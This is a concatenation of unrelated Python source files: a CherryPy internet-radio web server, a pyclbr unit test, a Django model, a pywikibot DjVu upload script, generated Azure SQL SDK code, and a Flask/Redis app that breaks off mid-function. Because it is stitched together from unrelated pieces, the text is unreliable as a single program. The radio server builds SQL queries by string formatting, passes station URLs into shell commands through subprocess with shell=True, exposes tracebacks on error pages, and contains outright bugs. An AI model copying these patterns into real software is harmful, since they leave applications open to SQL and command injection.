        html += '''<p><table class="table table-condensed">'''
        html += '''<tr>'''
        html += '''<td width="100px"><a href="#" onClick="fmodradio('%s')">''' % id
        html += '''Mod <span class="glyphicon glyphicon-pencil"></span></a></td>'''
        html += '''<td width="200px">%s</td>''' % name
        html += '''<td width="200px">%s</td>''' % genre
        html += '''<td><a href="%s" target="_blank">%s</a></td>''' % (url, url)
        html += '''<td width="300px"><a href="#" onClick="fplayradio('%s')">'''% url
        html += '''Play <span class="glyphicon glyphicon-play"></span></a></td>'''
        html += '''</tr>'''
        html += '''</table>'''

        return html

    @cherrypy.expose
    def haddfav(self, id=""):
        if id == "" or id == None :
          html += "Error missing id"
          return html

        if id == "0" :
          html += "0 is reserved, sorry"
          return html

        (name, genre, url) = getradio(id)
        if 'Fav' in genre:
            genre = genre.replace(', Fav', '')
            star = False
        else:
            genre += ', Fav'
            star = True

        if addgen(id, genre) == False:
            return ''

        (name, genre, url) = getradio(id)
        cherrypy.session['playing'] = id
        html = '<h3>Now Playing: '
        html += '''<a href="%s">%s</a>''' % (url, name)
        html += '''<a href="#" onClick="fplayradio('%s')">''' % url
        html += '''<span class="glyphicon glyphicon-play"></span></a>'''
        html += '''&nbsp;<a href="#" onClick="fmodradio('%s')"><span class="glyphicon glyphicon-pencil"></span></a></small>&nbsp;''' % id
        html += '''<a href="#" onClick="fdelradio('%s')"><span class="glyphicon glyphicon-trash"></span></a>&nbsp;''' % id
        html += '''<a href="#" onClick="faddfav('%s')"><span class="glyphicon glyphicon-star"></span></a>''' % id
        if star:
            html += '''Starred'''
        html += '''</h3>'''

        return html

    @cherrypy.expose
    def k(self):
        html = "<h2>Stopping</h2>"
        killall()
        return html

# ------------------------ DATABASE --------------------------------
def getfooter() :
    global footer, version

    db = cherrypy.session['database']
    try:
        con = lite.connect( db )
        cur = con.cursor()
        sql = "select radio, genre, url from Radio where id=0"
        cur.execute(sql)
        (radio, genre, url) = cur.fetchone()
    except:
        (radio, genre, url) = ('ERROR', sql, '')

    con.close()

    hostname = socket.gethostname()
    f = '''<footer class="footer"> <div class="container">'''
    f += '''<p class="text-muted">'''
    f += '''Session id: %s - Session Database %s<br>''' % (cherrypy.session.id, cherrypy.session['database'])
    f += '''Host: %s - Version: %s - Updated: %s // Last: %s''' % (hostname, version, genre, url)
    f += '''</p>'''
    f += '''</div></footer>'''
    return f + footer

def updateversiondb(cur) :
    db = cherrypy.session['database']
    username = cherrypy.session['username']

    dt = time.strftime("%Y-%m-%d %H:%M:%S")
    try:
        sql = "UPDATE Radio SET radio='%s', genre='%s' WHERE id = 0" % (hostname, dt)
        cur.execute(sql)
    except:
        return

def delete(id) :
    db = cherrypy.session['database']
    try:
        con = lite.connect( db )
        cur = con.cursor()
        sql =  "DELETE from Radio WHERE id = '%s'" % (id)
        cur.execute(sql)
        ret = True
    except:
        ret = False

    updateversiondb(cur)
    con.commit()
    con.close()
    return ret

def nonexist(id) :
    db = cherrypy.session['database']
    sql =  "UPDATE Radio set exist = 0 WHERE id = '%s'" % (id)
    try:
        con = lite.connect( db )
        cur = con.cursor()
        cur.execute(sql)
        ret = True
    except:
        ret = False

    updateversiondb(cur)
    con.commit()
    con.close()
    return ret

def insert(radio, genre, url) :
    db = cherrypy.session['database']
    sql =  "INSERT INTO Radio (radio, genre, url, exist) VALUES('%s', '%s', '%s', 1)" % (radio, genre, url)
    try:
        con = lite.connect( db )
        cur = con.cursor()
        cur.execute(sql)
        ret = True
    except:
        ret = False

    updateversiondb(cur)
    con.commit()
    con.close()
    return ret

def modify(id, radio, url, genre) :
    db = cherrypy.session['database']

    sql = "UPDATE Radio SET radio='%s', url='%s', genre='%s', exist=1 WHERE id = %s" % (radio, url, genre, id)
    try:
        con = lite.connect( db )
        cur = con.cursor()
        cur.execute(sql)
        ret = True
    except:
        ret = False

    updateversiondb(cur)
    con.commit()
    con.close()
    return ret

def addgen(id, genre) :
    db = cherrypy.session['database']

    sql = "UPDATE Radio SET genre='%s' WHERE id = %s" % (genre, id)
    try:
        con = lite.connect( db )
        cur = con.cursor()
        cur.execute(sql)
        ret = True
    except:
        ret = False

    updateversiondb(cur)
    con.commit()
    con.close()
    return ret

def getradio(id) :
    db = cherrypy.session['database']
    if id.isdigit() :
        sql = "select radio, genre, url from Radio where id=%s" % id
    else:
        sql = "select radio, genre, url from Radio where url=%s" % id
    try:
        con = lite.connect( db )
        cur = con.cursor()
        cur.execute(sql)
    except:
        rows = [('Not Found', '', '')]

    rows = cur.fetchone()
    if rows == None:
        rows = ('Not Found', '', '')

    con.close()

    return rows

def searchradio(radio, genre) :
    db = cherrypy.session['database']
    #o = 'order by radio'
    o = ''
    sql = "select id, radio, genre, url from Radio where exist > 0 and radio like '%%%s%%' and genre like '%%%s%%' and id > 0 %s" % (radio, genre, o)
    try:
        con = lite.connect( db )
        cur = con.cursor()
        cur.execute(sql)
    except:
        return [(0, sql, o, genre)]

    rows = cur.fetchall()
    con.close()
    return rows


def updatelastradio(url) :
    db = cherrypy.session['database']
    sql = "UPDATE Radio SET url='%s' WHERE id=0" % (url)
    try:
        con = lite.connect( db )
        cur = con.cursor()
        cur.execute(sql)
        con.commit()
        con.close()
    except:
        return

def userdatabase(user) :
    db = database
    if not os.path.isfile(db):
        return None
    return db

def getshort(code) :
    maxl = 5
    newcode = code.replace('http://', '')
    if len(newcode) > maxl :
          newcode = newcode[0:maxl]
    return str(newcode)

def setplayer(p):
    global player
    player = p

def playradio(urlid):
    global player

    (radio, genre, url) = getradio(urlid)

    status = 0
    killall()
    if player == 'mpg123':
        command = "/usr/bin/mpg123 -q %s" % url
        pidplayer = subprocess.Popen(command, shell=True).pid
    if player == 'mplayer':
        command = "/usr/bin/mplayer -really-quiet %s" % url
        pidplayer = subprocess.Popen(command, shell=True).pid
    if player == 'omxplayer':
        # Process is in background
        p = 'omxplayer'
        subprocess.Popen([p, url])

    updatelastradio(urlid)
    return (radio, genre, urlid)

def killall():
    global player
    status = 0
    if player == 'omxplayer':
        control = "/usr/local/bin/omxcontrol"
        status = subprocess.call([control,  "stop"])
    status = subprocess.call(["pkill", player])

    return status

def volume(vol) :
    global player
    if player == 'omxplayer':
        return volume_omxplayer(vol)
    else:
        return volume_alsa(vol)

def volume_alsa(vol):
    # With ALSA on CHIP
    if vol == 'up':
        db = subprocess.check_output(["amixer set 'Power Amplifier' 5%+"], shell=True)
        #db = os.system("amixer set 'Power Amplifier' 5%+")
    if vol == 'down':
        db = subprocess.check_output(["amixer set 'Power Amplifier' 5%-"], shell=True)
        #db = os.system("amixer set 'Power Amplifier' 5%-")
    i = db.rfind(':')
    return db[i+1:]

def volume_omxplayer(vol) :
    import math
    control = "/usr/local/bin/omxcontrol"
    if vol == 'up' :
        db = subprocess.check_output([control, "volumeup"])
    else :
        db = subprocess.check_output([control, "volumedown"])

    v = subprocess.check_output([control, "volume"])
    i = v.rfind(':')
    db = 10.0 * math.log(float(v[i+1:]), 10)
    volstring = "%-2.2f dB" % db
    return volstring

# ------------------------ SYSTEM --------------------------------
def writemypid(pidfile):
    pid = str(os.getpid())
    with open(pidfile, 'w') as f:
        f.write(pid)
    f.close

# Cherrypy Management
def error_page_404(status, message, traceback, version):
    html = header
    html += "%s<br>" % (status)
    html += "%s" % (traceback)
    html += getfooter()
    return html

def error_page_401(status, message, traceback, version):
    html = '''<!DOCTYPE html>
<html lang="en">
<head>
  <title>My Radio Web Server</title>
  <meta name="generator" content="Vim">
  <meta charset="UTF-8">
</head>
<body>
   '''
    html += "<h1>%s</h1>" % (status)
    html += "%s<br>" % (message)

    return html

# Secure headers!
def secureheaders():
    headers = cherrypy.response.headers
    headers['X-Frame-Options'] = 'DENY'
    headers['X-XSS-Protection'] = '1; mode=block'
    headers['Content-Security-Policy'] = "default-src='self'"

if __name__ == '__main__':

    import argparse

    parser = argparse.ArgumentParser()
    parser.add_argument('--player', action="store", dest="player", default="mplayer")
    parser.add_argument('--stage', action="store", dest="stage", default="production")
    parser.add_argument('--database', action="store", dest="database",  default="database.db")
    parser.add_argument('--root', action="store", dest="root", default=".")
    parser.add_argument('--pid', action="store", dest="pid", default="/tmp/8804.pid")
    parser.add_argument('--port', action="store", dest="port", type=int, default=8804)

    # get args
    args = parser.parse_args()

    # Where to start, what to get
    root = os.path.abspath(args.root)
    database = os.path.join(root, args.database)
    os.chdir(root)
    current_dir = os.path.dirname(os.path.abspath(__file__))
    setplayer(args.player)

    writemypid(args.pid)

    settings = {'global': {'server.socket_host': "0.0.0.0",
                           'server.socket_port' : args.port,
                           'log.screen': True,
                          },
               }

    conf = {'/static': {'tools.staticdir.on': True,
                     'tools.staticdir.root': current_dir,
                     'tools.staticfile.filename': 'icon.png',
                     'tools.staticdir.dir': 'static'
                    },
            '/':    {
                     'tools.auth_basic.on': True,
                     'tools.auth_basic.realm': 'localhost',
                     'tools.auth_basic.checkpassword': validate_password,
                     'tools.secureheaders.on' : True,
                     'tools.sessions.on': True,
                    },
           }

    cherrypy.config.update(settings)
    cherrypy.config.update({'error_page.404': error_page_404})
    cherrypy.config.update({'error_page.401': error_page_401})
    cherrypy.tools.secureheaders = cherrypy.Tool('before_finalize', secureheaders, priority=60)

    # To make it ZERO CPU usage
    #cherrypy.engine.timeout_monitor.unsubscribe()
    #cherrypy.engine.autoreload.unsubscribe()

    # Cherry insert pages
    serverroot = Root()

    # Start the CherryPy server.
    cherrypy.quickstart(serverroot, config=conf)


'''
   Test cases for pyclbr.py
   Nick Mathewson
'''
from test.test_support import run_unittest, import_module
import sys
from types import ClassType, FunctionType, MethodType, BuiltinFunctionType
import pyclbr
from unittest import TestCase

StaticMethodType = type(staticmethod(lambda: None))
ClassMethodType = type(classmethod(lambda c: None))

# Silence Py3k warning
import_module('commands', deprecated=True)

# This next line triggers an error on old versions of pyclbr.
from commands import getstatus

# Here we test the python class browser code.
#
# The main function in this suite, 'testModule', compares the output
# of pyclbr with the introspected members of a module.  Because pyclbr
# is imperfect (as designed), testModule is called with a set of
# members to ignore.

class PyclbrTest(TestCase):

    def assertListEq(self, l1, l2, ignore):
        ''' succeed iff {l1} - {ignore} == {l2} - {ignore} '''
        missing = (set(l1) ^ set(l2)) - set(ignore)
        if missing:
            print >>sys.stderr, "l1=%r\nl2=%r\nignore=%r" % (l1, l2, ignore)
            self.fail("%r missing" % missing.pop())

    def assertHasattr(self, obj, attr, ignore):
        ''' succeed iff hasattr(obj,attr) or attr in ignore. '''
        if attr in ignore: return
        if not hasattr(obj, attr): print "???", attr
        self.failUnless(hasattr(obj, attr),
                        'expected hasattr(%r, %r)' % (obj, attr))


    def assertHaskey(self, obj, key, ignore):
        ''' succeed iff key in obj or key in ignore. '''
        if key in ignore: return
        if key not in obj:
            print >>sys.stderr, "***", key
        self.assertTrue(key in obj)

    def assertEqualsOrIgnored(self, a, b, ignore):
        ''' succeed iff a == b or a in ignore or b in ignore '''
        if a not in ignore and b not in ignore:
            self.assertEqual(a, b)

    def checkModule(self, moduleName, module=None, ignore=()):
        ''' succeed iff pyclbr.readmodule_ex(modulename) corresponds
            to the actual module object, module.  Any identifiers in
            ignore are ignored.   If no module is provided, the appropriate
            module is loaded with __import__.'''

        if module is None:
            # Import it.
            # ('<silly>' is to work around an API silliness in __import__)
            module = __import__(moduleName, globals(), {}, ['<silly>'])

        dict = pyclbr.readmodule_ex(moduleName)

        def ismethod(oclass, obj, name):
            classdict = oclass.__dict__
            if isinstance(obj, FunctionType):
                if not isinstance(classdict[name], StaticMethodType):
                    return False
            else:
                if not  isinstance(obj, MethodType):
                    return False
                if obj.im_self is not None:
                    if (not isinstance(classdict[name], ClassMethodType) or
                        obj.im_self is not oclass):
                        return False
                else:
                    if not isinstance(classdict[name], FunctionType):
                        return False

            objname = obj.__name__
            if objname.startswith("__") and not objname.endswith("__"):
                objname = "_%s%s" % (obj.im_class.__name__, objname)
            return objname == name

        # Make sure the toplevel functions and classes are the same.
        for name, value in dict.items():
            if name in ignore:
                continue
            self.assertHasattr(module, name, ignore)
            py_item = getattr(module, name)
            if isinstance(value, pyclbr.Function):
                self.assert_(isinstance(py_item, (FunctionType, BuiltinFunctionType)))
                if py_item.__module__ != moduleName:
                    continue   # skip functions that came from somewhere else
                self.assertEquals(py_item.__module__, value.module)
            else:
                self.failUnless(isinstance(py_item, (ClassType, type)))
                if py_item.__module__ != moduleName:
                    continue   # skip classes that came from somewhere else

                real_bases = [base.__name__ for base in py_item.__bases__]
                pyclbr_bases = [ getattr(base, 'name', base)
                                 for base in value.super ]

                try:
                    self.assertListEq(real_bases, pyclbr_bases, ignore)
                except:
                    print >>sys.stderr, "class=%s" % py_item
                    raise

                actualMethods = []
                for m in py_item.__dict__.keys():
                    if ismethod(py_item, getattr(py_item, m), m):
                        actualMethods.append(m)
                foundMethods = []
                for m in value.methods.keys():
                    if m[:2] == '__' and m[-2:] != '__':
                        foundMethods.append('_'+name+m)
                    else:
                        foundMethods.append(m)

                try:
                    self.assertListEq(foundMethods, actualMethods, ignore)
                    self.assertEquals(py_item.__module__, value.module)

                    self.assertEqualsOrIgnored(py_item.__name__, value.name,
                                               ignore)
                    # can't check file or lineno
                except:
                    print >>sys.stderr, "class=%s" % py_item
                    raise

        # Now check for missing stuff.
        def defined_in(item, module):
            if isinstance(item, ClassType):
                return item.__module__ == module.__name__
            if isinstance(item, FunctionType):
                return item.func_globals is module.__dict__
            return False
        for name in dir(module):
            item = getattr(module, name)
            if isinstance(item,  (ClassType, FunctionType)):
                if defined_in(item, module):
                    self.assertHaskey(dict, name, ignore)

    def test_easy(self):
        self.checkModule('pyclbr')
        self.checkModule('doctest')
        # Silence Py3k warning
        rfc822 = import_module('rfc822', deprecated=True)
        self.checkModule('rfc822', rfc822)
        self.checkModule('difflib')

    def test_decorators(self):
        # XXX: See comment in pyclbr_input.py for a test that would fail
        #      if it were not commented out.
        #
        self.checkModule('test.pyclbr_input')

    def test_others(self):
        cm = self.checkModule

        # These were once about the 10 longest modules
        cm('random', ignore=('Random',))  # from _random import Random as CoreGenerator
        cm('cgi', ignore=('log',))      # set with = in module
        cm('urllib', ignore=('_CFNumberToInt32',
                             '_CStringFromCFString',
                             '_CFSetup',
                             'getproxies_registry',
                             'proxy_bypass_registry',
                             'proxy_bypass_macosx_sysconf',
                             'open_https',
                             'getproxies_macosx_sysconf',
                             'getproxies_internetconfig',)) # not on all platforms
        cm('pickle')
        cm('aifc', ignore=('openfp',))  # set with = in module
        cm('Cookie')
        cm('sre_parse', ignore=('dump',)) # from sre_constants import *
        cm('pdb')
        cm('pydoc')

        # Tests for modules inside packages
        cm('email.parser')
        cm('test.test_pyclbr')


def test_main():
    run_unittest(PyclbrTest)


if __name__ == "__main__":
    test_main()

from django.db import models
from django.core.urlresolvers import reverse

class Software(models.Model):
    name = models.CharField(max_length=200)

    def __unicode__(self):
        return self.name

    def get_absolute_url(self):
        return reverse('software_edit', kwargs={'pk': self.pk})


#!/usr/bin/python3
"""
This bot uploads text from djvu files onto pages in the "Page" namespace.

It is intended to be used for Wikisource.

The following parameters are supported:

    -index:...     name of the index page (without the Index: prefix)
    -djvu:...      path to the djvu file, it shall be:
                   - path to a file name
                   - dir where a djvu file name as index is located
                   optional, by default is current dir '.'
    -pages:<start>-<end>,...<start>-<end>,<start>-<end>
                   Page range to upload;
                   optional, start=1, end=djvu file number of images.
                   Page ranges can be specified as:
                     A-B -> pages A until B
                     A-  -> pages A until number of images
                     A   -> just page A
                     -B  -> pages 1 until B

This script is a :py:obj:`ConfigParserBot <pywikibot.bot.ConfigParserBot>`.
The following options can be set within a settings file which is scripts.ini
by default:

    -summary:      custom edit summary.
                   Use quotes if edit summary contains spaces.
    -force         overwrites existing text
                   optional, default False
    -always        do not bother asking to confirm any of the changes.

"""
#
# (C) Pywikibot team, 2008-2022
#
# Distributed under the terms of the MIT license.
#
import os.path
from typing import Optional

import pywikibot
from pywikibot import i18n
from pywikibot.bot import SingleSiteBot
from pywikibot.exceptions import NoPageError
from pywikibot.proofreadpage import ProofreadPage
from pywikibot.tools.djvu import DjVuFile


class DjVuTextBot(SingleSiteBot):

    """
    A bot that uploads text-layer from djvu files to Page:namespace.

    Works only on sites with Proofread Page extension installed.

    .. versionchanged:: 7.0
       CheckerBot is a ConfigParserBot
    """

    update_options = {
        'force': False,
        'summary': '',
    }

    def __init__(
        self,
        djvu,
        index,
        pages: Optional[tuple] = None,
        **kwargs
    ) -> None:
        """
        Initializer.

        :param djvu: djvu from where to fetch the text layer
        :type djvu: DjVuFile object
        :param index: index page in the Index: namespace
        :type index: Page object
        :param pages: page interval to upload (start, end)
        """
        super().__init__(**kwargs)
        self._djvu = djvu
        self._index = index
        self._prefix = self._index.title(with_ns=False)
        self._page_ns = self.site._proofread_page_ns.custom_name

        if not pages:
            self._pages = (1, self._djvu.number_of_images())
        else:
            self._pages = pages

        # Get edit summary message if it's empty.
        if not self.opt.summary:
            self.opt.summary = i18n.twtranslate(self._index.site,
                                                'djvutext-creating')

    def page_number_gen(self):
        """Generate pages numbers from specified page intervals."""
        last = 0
        for start, end in sorted(self._pages):
            start = max(last, start)
            last = end + 1
            yield from range(start, last)

    @property
    def generator(self):
        """Generate pages from specified page interval."""
        for page_number in self.page_number_gen():
            title = '{page_ns}:{prefix}/{number}'.format(
                page_ns=self._page_ns,
                prefix=self._prefix,
                number=page_number)
            page = ProofreadPage(self._index.site, title)
            page.page_number = page_number  # remember page number in djvu file
            yield page

    def treat(self, page) -> None:
        """Process one page."""
        old_text = page.text

        # Overwrite body of the page with content from djvu
        page.body = self._djvu.get_page(page.page_number)
        new_text = page.text

        if page.exists() and not self.opt.force:
            pywikibot.output(
                'Page {} already exists, not adding!\n'
                'Use -force option to overwrite the output page.'
                .format(page))
        else:
            self.userPut(page, old_text, new_text, summary=self.opt.summary)


def main(*args: str) -> None:
    """
    Process command line arguments and invoke bot.

    If args is an empty list, sys.argv is used.

    :param args: command line arguments
    """
    index = None
    djvu_path = '.'  # default djvu file directory
    pages = '1-'
    options = {}

    # Parse command line arguments.
    local_args = pywikibot.handle_args(args)
    for arg in local_args:
        opt, _, value = arg.partition(':')
        if opt == '-index':
            index = value
        elif opt == '-djvu':
            djvu_path = value
        elif opt == '-pages':
            pages = value
        elif opt == '-summary':
            options['summary'] = value
        elif opt in ('-force', '-always'):
            options[opt[1:]] = True
        else:
            pywikibot.output('Unknown argument ' + arg)

    # index is mandatory.
    if not index:
        pywikibot.bot.suggest_help(missing_parameters=['-index'])
        return

    # If djvu_path is not a file, build djvu_path from dir+index.
    djvu_path = os.path.expanduser(djvu_path)
    djvu_path = os.path.abspath(djvu_path)
    if not os.path.exists(djvu_path):
        pywikibot.error('No such file or directory: ' + djvu_path)
        return

    if os.path.isdir(djvu_path):
        djvu_path = os.path.join(djvu_path, index)

    # Check the djvu file exists and, if so, create the DjVuFile wrapper.
    djvu = DjVuFile(djvu_path)

    if not djvu.has_text():
        pywikibot.error('No text layer in djvu file {}'.format(djvu.file))
        return

    # Parse pages param.
    pages = pages.split(',')
    for i, page_interval in enumerate(pages):
        start, sep, end = page_interval.partition('-')
        start = int(start or 1)
        end = int(end or djvu.number_of_images()) if sep else start
        pages[i] = (start, end)

    site = pywikibot.Site()
    if not site.has_extension('ProofreadPage'):
        pywikibot.error('Site {} must have ProofreadPage extension.'
                        .format(site))
        return

    index_page = pywikibot.Page(site, index, ns=site.proofread_index_ns)

    if not index_page.exists():
        raise NoPageError(index)

    pywikibot.output('uploading text from {} to {}'
                     .format(djvu.file, index_page.title(as_link=True)))

    bot = DjVuTextBot(djvu, index_page, pages=pages, site=site, **options)
    bot.run()


if __name__ == '__main__':
    try:
        main()
    except Exception:
        pywikibot.error('Fatal error:', exc_info=True)

# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
import warnings

from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.mgmt.core.exceptions import ARMErrorFormat
from msrest import Serializer

from .. import models as _models
from .._vendor import _convert_request, _format_url_section
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]

_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False

def build_get_request(
    resource_group_name: str,
    managed_instance_name: str,
    database_name: str,
    query_id: str,
    subscription_id: str,
    **kwargs: Any
) -> HttpRequest:
    api_version = "2020-11-01-preview"
    accept = "application/json"
    # Construct URL
    url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Sql/managedInstances/{managedInstanceName}/databases/{databaseName}/queries/{queryId}')
    path_format_arguments = {
        "resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str'),
        "managedInstanceName": _SERIALIZER.url("managed_instance_name", managed_instance_name, 'str'),
        "databaseName": _SERIALIZER.url("database_name", database_name, 'str'),
        "queryId": _SERIALIZER.url("query_id", query_id, 'str'),
        "subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
    }

    url = _format_url_section(url, **path_format_arguments)

    # Construct parameters
    query_parameters = kwargs.pop("params", {})  # type: Dict[str, Any]
    query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')

    # Construct headers
    header_parameters = kwargs.pop("headers", {})  # type: Dict[str, Any]
    header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')

    return HttpRequest(
        method="GET",
        url=url,
        params=query_parameters,
        headers=header_parameters,
        **kwargs
    )


def build_list_by_query_request(
    resource_group_name: str,
    managed_instance_name: str,
    database_name: str,
    query_id: str,
    subscription_id: str,
    *,
    start_time: Optional[str] = None,
    end_time: Optional[str] = None,
    interval: Optional[Union[str, "_models.QueryTimeGrainType"]] = None,
    **kwargs: Any
) -> HttpRequest:
    api_version = "2020-11-01-preview"
    accept = "application/json"
    # Construct URL
    url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Sql/managedInstances/{managedInstanceName}/databases/{databaseName}/queries/{queryId}/statistics')
    path_format_arguments = {
        "resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str'),
        "managedInstanceName": _SERIALIZER.url("managed_instance_name", managed_instance_name, 'str'),
        "databaseName": _SERIALIZER.url("database_name", database_name, 'str'),
        "queryId": _SERIALIZER.url("query_id", query_id, 'str'),
        "subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
    }

    url = _format_url_section(url, **path_format_arguments)

    # Construct parameters
    query_parameters = kwargs.pop("params", {})  # type: Dict[str, Any]
    if start_time is not None:
        query_parameters['startTime'] = _SERIALIZER.query("start_time", start_time, 'str')
    if end_time is not None:
        query_parameters['endTime'] = _SERIALIZER.query("end_time", end_time, 'str')
    if interval is not None:
        query_parameters['interval'] = _SERIALIZER.query("interval", interval, 'str')
    query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')

    # Construct headers
    header_parameters = kwargs.pop("headers", {})  # type: Dict[str, Any]
    header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')

    return HttpRequest(
        method="GET",
        url=url,
        params=query_parameters,
        headers=header_parameters,
        **kwargs
    )

class ManagedDatabaseQueriesOperations(object):
    """ManagedDatabaseQueriesOperations operations.

    You should not instantiate this class directly. Instead, you should create a Client instance that
    instantiates it for you and attaches it as an attribute.

    :ivar models: Alias to model classes used in this operation group.
    :type models: ~azure.mgmt.sql.models
    :param client: Client for service requests.
    :param config: Configuration of service client.
    :param serializer: An object model serializer.
    :param deserializer: An object model deserializer.
    """

    models = _models

    def __init__(self, client, config, serializer, deserializer):
        self._client = client
        self._serialize = serializer
        self._deserialize = deserializer
        self._config = config

    @distributed_trace
    def get(
        self,
        resource_group_name: str,
        managed_instance_name: str,
        database_name: str,
        query_id: str,
        **kwargs: Any
    ) -> "_models.ManagedInstanceQuery":
        """Get query by query id.

        :param resource_group_name: The name of the resource group that contains the resource. You can
         obtain this value from the Azure Resource Manager API or the portal.
        :type resource_group_name: str
        :param managed_instance_name: The name of the managed instance.
        :type managed_instance_name: str
        :param database_name: The name of the database.
        :type database_name: str
        :param query_id:
        :type query_id: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: ManagedInstanceQuery, or the result of cls(response)
        :rtype: ~azure.mgmt.sql.models.ManagedInstanceQuery
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.ManagedInstanceQuery"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))

        
        request = build_get_request(
            resource_group_name=resource_group_name,
            managed_instance_name=managed_instance_name,
            database_name=database_name,
            query_id=query_id,
            subscription_id=self._config.subscription_id,
            template_url=self.get.metadata['url'],
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)

        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)

        deserialized = self._deserialize('ManagedInstanceQuery', pipeline_response)

        if cls:
            return cls(pipeline_response, deserialized, {})

        return deserialized

    get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Sql/managedInstances/{managedInstanceName}/databases/{databaseName}/queries/{queryId}'}  # type: ignore


    @distributed_trace
    def list_by_query(
        self,
        resource_group_name: str,
        managed_instance_name: str,
        database_name: str,
        query_id: str,
        start_time: Optional[str] = None,
        end_time: Optional[str] = None,
        interval: Optional[Union[str, "_models.QueryTimeGrainType"]] = None,
        **kwargs: Any
    ) -> Iterable["_models.ManagedInstanceQueryStatistics"]:
        """Get query execution statistics by query id.

        :param resource_group_name: The name of the resource group that contains the resource. You can
         obtain this value from the Azure Resource Manager API or the portal.
        :type resource_group_name: str
        :param managed_instance_name: The name of the managed instance.
        :type managed_instance_name: str
        :param database_name: The name of the database.
        :type database_name: str
        :param query_id:
        :type query_id: str
        :param start_time: Start time for observed period.
        :type start_time: str
        :param end_time: End time for observed period.
        :type end_time: str
        :param interval: The time step to be used to summarize the metric values.
        :type interval: str or ~azure.mgmt.sql.models.QueryTimeGrainType
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either ManagedInstanceQueryStatistics or the result of
         cls(response)
        :rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.sql.models.ManagedInstanceQueryStatistics]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.ManagedInstanceQueryStatistics"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        def prepare_request(next_link=None):
            if not next_link:
                
                request = build_list_by_query_request(
                    resource_group_name=resource_group_name,
                    managed_instance_name=managed_instance_name,
                    database_name=database_name,
                    query_id=query_id,
                    subscription_id=self._config.subscription_id,
                    start_time=start_time,
                    end_time=end_time,
                    interval=interval,
                    template_url=self.list_by_query.metadata['url'],
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)

            else:
                
                request = build_list_by_query_request(
                    resource_group_name=resource_group_name,
                    managed_instance_name=managed_instance_name,
                    database_name=database_name,
                    query_id=query_id,
                    subscription_id=self._config.subscription_id,
                    start_time=start_time,
                    end_time=end_time,
                    interval=interval,
                    template_url=next_link,
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)
                request.method = "GET"
            return request

        def extract_data(pipeline_response):
            deserialized = self._deserialize("ManagedInstanceQueryStatistics", pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, iter(list_of_elem)

        def get_next(next_link=None):
            request = prepare_request(next_link)

            pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response

            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, error_format=ARMErrorFormat)

            return pipeline_response


        return ItemPaged(
            get_next, extract_data
        )
    list_by_query.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Sql/managedInstances/{managedInstanceName}/databases/{databaseName}/queries/{queryId}/statistics'}  # type: ignore

import redis
import logging
import simplejson as json
import sys
from msgpack import Unpacker
from flask import Flask, request, render_template
from daemon import runner
from os.path import dirname, abspath

# add the shared settings file to namespace
sys.path.insert(0, dirname(dirname(abspath(__file__))))
import settings

REDIS_CONN = redis.StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)

app = Flask(__name__)
app.config['PROPAGATE_EXCEPTIONS'] = True


@app.route("/")
def index():
    return render_template('index.html'), 200


@app.route("/app_settings")
def app_settings():

    app_settings = {'GRAPHITE_HOST': settings.GRAPHITE_HOST,
                    'OCULUS_HOST': settings.OCULUS_HOST,
                    'FULL_NAMESPACE': settings.FULL_NAMESPACE,
                    }

    resp = json.dumps(app_settings)
    return resp, 200


@app.route("/api", methods=['GET'])
def data():
    metric = request.args.get('metric', None)
    try:
        raw_series = REDIS_CONN.get(metric)
        if not raw_series:
